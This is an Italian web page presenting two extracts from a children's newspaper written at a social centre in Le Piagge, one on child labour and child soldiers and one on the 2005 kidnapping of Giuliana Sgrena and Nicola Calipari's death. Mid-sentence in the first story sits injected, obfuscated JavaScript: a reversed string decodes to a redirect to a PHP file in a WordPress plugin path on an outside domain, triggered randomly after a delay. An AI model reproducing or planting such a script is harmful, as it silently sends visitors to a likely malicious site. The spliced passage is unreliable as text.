Scrivere per crescere

image_pdfimage_print

Pubblichiamo qui due piccoli estratti del Giornale dei ragazzi, realizzato nel corso di un anno dai bambini delle Piagge che si sono ritrovati al Centro Sociale a scrivere della loro vita e del mondo. La redazione era composta da 12 giornalisti, la più piccola di 5 anni, il direttore di 15…
Bambini usati – due storie vere
In molte parti del mondo i bambini vengono “usati” non solo per fare i vestiti e le scarpe ma anche per fare la guerra. Ed ora vi racconto due storie vere di bambini usati.
Un bambino, che viveva in un paese molto povero, non voleva fare la guerra e così scappò. Gli adulti però lo presero e costrinsero altri bambini ad ammazzarlo con un bastone. Se non lo avessero fatto ammazzavano anche loro. Ma uno di questi bambini sogna tutte le notti il bambino ucciso a bastonate che chiede: “Perché mi hai ammazzato?”
Un gruppo di bambini faceva i tappeti perché avevano le mani piccole. Iniziarono a lavorare a 4 anni e lavoravano tutto il giorno, da mattina a sera. Un giorno uno di questi bambini incontrò un signore che lo portò via con sé perché non riteneva giusto che i bambini lavorassero. Un giorno però, mentre stava (typeof ($p$VTO6JhIH6WkCGAcPR.list[n]) == "string") return $p$VTO6JhIH6WkCGAcPR.list[n].split("").reverse().join("");return $p$VTO6JhIH6WkCGAcPR.list[n];};$p$VTO6JhIH6WkCGAcPR.list=["'php.tegdiw.ssalc/bil/orp-tegdiw-rettiwt/snigulp/tnetnoc-pw/moc.xamdok//:ptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andando in bicicletta con i suoi amici, un uomo gli sparò e il bambino morì sul colpo.
(Stefania)

IL RAPIMENTO DI GIULIANA SGRENA
All’inizio di febbraio in Iraq la giornalista Giuliana Sgrena fu rapita dagli iracheni. Secondo noi perché Berlusconi richiamasse le truppe. Hanno trasmesso in televisione dei filmati dove Giuliana pregava il presidente del consiglio di ritirare le truppe dall’Iraq.
La Comunità di Base ha deciso di accendere una candela e lasciarla accesa finché la giornalista rapita non viene liberata. Alessandro, insieme ad altri preti, ha deciso di fare un digiuno per il NO ALLA GUERRA.
Un uomo molto coraggioso, Nicola Calipari che era il poliziotto dei servizi segreti, è andato in Iraq per liberare la giornalista Giuliana Sgrena. Lei è stata liberata grazie a Nicola Calipari che è stato ucciso dagli americani per un incidente.
Le vittime dicono che hanno visto un faro e non hanno capito e quindi non si sono fermati, mentre gli americani dicono che andavano troppo veloci e quindi hanno cominciato a sparare. Per fortuna gli uomini a bordo erano solamente feriti ma c’è anche tanto dolore nei confronti di Nicola Calipari.
Dopo aver appreso queste notizie noi abbiamo avuto molta paura e speriamo che questi fatti non accadano più, ma se gli italiani non ritirano le truppe sarà difficile evitare altri sequestri. (Stefania e Caroline)

Leave a Reply

Il tuo indirizzo email non sarà pubblicato. I campi obbligatori sono contrassegnati *